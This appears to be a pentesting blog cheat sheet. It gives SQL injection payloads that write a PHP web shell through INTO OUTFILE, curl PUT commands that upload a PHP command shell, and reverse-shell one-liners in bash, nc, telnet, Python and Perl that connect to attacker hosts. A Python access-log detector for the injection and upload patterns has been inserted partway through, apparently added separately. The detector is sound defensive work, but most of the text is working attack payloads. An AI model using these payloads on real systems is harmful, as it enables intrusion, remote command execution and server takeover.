
Web Penetration (SQL Injection, PUT, Reverse Shell)

우와해커 2020. 7. 8. 21:18

Manual SQL Injection Cheat sheet

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html

https://guide.offsecnewbie.com/5-sql

Load File
http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'

Write File
http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'

http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'


Exploiting HTTP method weaknesses with curl
curl -v -X OPTIONS http://192.168.97.130/test
curl -v -X PUT -d '<?php system($_GET["cmd"]);?>' http://192.168.0.105/test/shell.php

If you intend to upload a shell with more functionality
=> it is easier to paste the source code in through Burp.

If the www user has no write permission on the reachable folder and nc cannot be downloaded
> a reverse shell can be connected using a language already installed on the system.
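As an added defender-side example (not part of the original post), a small Python detector that flags the two techniques above in Apache access-log lines: an id parameter carrying UNION ... INTO OUTFILE, and an OPTIONS probe followed by a PUT of a script file. The log lines, IPs and paths are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format, trimmed).
# 10.0.0.9 probes with UNION ... INTO OUTFILE, then OPTIONS, then PUT shell.php.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2020:21:10:01 +0900] "GET /photoalbum.php?id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [08/Jul/2020:21:11:42 +0900] "GET /photoalbum.php?id=1%20union%20all%20select%201,2,3,4,%27x%27,6,7,8,9%20into%20OUTFILE%20%27/var/www/html/cmd.php%27 HTTP/1.1" 200 5120
10.0.0.9 - - [08/Jul/2020:21:12:10 +0900] "OPTIONS /test HTTP/1.1" 200 0
10.0.0.9 - - [08/Jul/2020:21:12:15 +0900] "PUT /test/shell.php HTTP/1.1" 201 0
10.0.0.7 - - [08/Jul/2020:21:13:00 +0900] "PUT /api/items/42 HTTP/1.1" 204 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# UNION SELECT ... INTO OUTFILE / DUMPFILE is the file-write primitive shown above.
OUTFILE_RE = re.compile(r"union\s+(all\s+)?select\b.*\binto\s+(out|dump)file\b", re.I | re.S)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return a list of (ip, rule, detail) findings from raw access-log text."""
    findings = []
    options_seen = set()  # IPs that enumerated allowed methods with OPTIONS
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        decoded = unquote_plus(path)  # %20 / %27 hide the SQL keywords otherwise
        if OUTFILE_RE.search(decoded):
            findings.append((ip, "sqli_into_outfile", decoded))
        if method == "OPTIONS":
            options_seen.add(ip)
        if method == "PUT" and decoded.lower().split("?")[0].endswith(SCRIPT_EXT):
            rule = "put_script_after_options" if ip in options_seen else "put_script_upload"
            # 201/204 mean the server actually stored the body; 405 means PUT was refused.
            findings.append((ip, rule, f"{decoded} status={status}"))
    return findings
```

Run it over a real access log and a 201 on a PUT of a script extension is the line to act on; the PUT to a REST resource without a script extension is deliberately left unflagged.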


Reverse shell code


Python

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);

> Other languages such as Perl can also be used to download it.

# bash
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

#sh
rm -f /tmp/p; mknod /tmp/p p && nc <attacker-ip> 4444 0/tmp/p

#telnet
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker-ip> 80 0/tmp/p

# python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# perl 
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
